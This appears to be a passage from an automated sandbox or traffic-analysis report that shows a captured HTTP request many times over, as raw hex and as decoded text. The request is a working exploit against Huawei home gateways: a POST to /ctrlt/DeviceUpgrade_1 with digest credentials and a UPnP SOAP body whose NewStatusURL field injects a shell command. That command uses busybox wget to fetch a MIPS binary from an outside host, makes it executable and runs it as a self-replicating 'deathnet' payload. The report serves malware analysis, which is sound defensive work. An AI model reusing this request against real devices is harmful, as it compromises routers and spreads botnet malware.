75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 